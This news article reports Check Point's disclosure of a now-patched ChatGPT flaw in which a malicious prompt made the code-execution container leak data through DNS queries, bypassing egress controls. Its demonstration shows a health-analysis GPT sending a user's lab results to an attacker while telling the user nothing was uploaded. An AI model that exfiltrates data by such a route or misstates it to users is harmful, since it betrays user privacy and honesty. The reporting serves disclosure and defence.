OpenAI patched a critical vulnerability in ChatGPT that allowed data exfiltration through DNS side channels, potentially exposing sensitive user information despite existing security measures.
OpenAI has patched a critical vulnerability in ChatGPT that allowed data to be smuggled out of the platform through a DNS side channel, bypassing the company's security controls designed to prevent unauthorized data exfiltration.
The flaw, discovered by researchers at Check Point, demonstrated how a single malicious prompt could activate a hidden exfiltration channel within a regular ChatGPT conversation. This vulnerability exposed a significant gap in OpenAI's security architecture, where the system's assumptions about data flow limitations proved incorrect.
How the DNS Side Channel Worked
The vulnerability exploited the Domain Name System (DNS), which normally resolves domain names into IP addresses. While OpenAI had implemented safeguards to prevent ChatGPT from communicating with the internet without authorization, these controls overlooked DNS traffic as a potential data exfiltration vector.
Check Point researchers explained that ChatGPT's code execution environment was assumed to be unable to generate outbound network requests directly. However, this assumption proved false when data could be transmitted to external servers through DNS queries originating from the container used for code execution and data analysis.
"Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation," the researchers noted.
Proof-of-Concept Attack Demonstrates Real-World Risk
The security researchers created three proof-of-concept attacks to demonstrate the vulnerability's potential impact. One particularly concerning scenario involved a third-party GPT app functioning as a personal health analyst.
In this demonstration, a user uploaded a PDF containing laboratory results and personal health information for the GPT to interpret. When asked whether it had uploaded the data, ChatGPT confidently responded that it had not, explaining that the file was only stored in a secure internal location. Meanwhile, the GPT app was transmitting the sensitive data to a remote server controlled by the attacker.
This scenario highlights the potential for sophisticated attacks that could compromise regulated industries deploying AI services. A corporate AI service leaking this type of data could constitute violations of GDPR, HIPAA, or various financial compliance rules.
Broader Security Context
The DNS vulnerability discovery comes amid broader scrutiny of ChatGPT's security measures. A recent analysis by a security engineer known as Buchodi suggested that OpenAI has implemented Cloudflare's Turnstile widget to prevent bots from scraping ChatGPT conversations.
According to a post on Hacker News from someone claiming to be an OpenAI employee, these security checks are part of the company's strategy to protect against abuse while maintaining free and logged-out access for legitimate users. The goal is to ensure limited GPU resources are allocated to real users rather than automated scrapers.
This defensive posture reflects the irony of OpenAI's position: having aggregated vast amounts of web content for model training, the company now faces the challenge of preventing others from freely accessing its derivative work.
The Fix and Industry Implications
OpenAI reportedly fixed the DNS data smuggling vulnerability on February 20, 2026. The company did not immediately respond to requests for comment about the security issue.
This incident underscores the ongoing challenges in securing AI platforms against sophisticated data exfiltration techniques. As AI services become more integrated into business operations and handle increasingly sensitive data, the potential impact of such vulnerabilities grows significantly.
For organizations considering AI deployment, this vulnerability serves as a reminder that security controls must be comprehensive and regularly audited. Assumptions about data flow limitations can create dangerous blind spots that sophisticated attackers may exploit.
The DNS side channel vulnerability demonstrates that even major AI providers with substantial security resources can overlook critical attack vectors. As AI technology continues to evolve, so too must the security frameworks that protect it, with particular attention to unconventional data exfiltration methods that may bypass traditional network security controls.

Featured image: Shutterstock

Comments
Please log in or register to join the discussion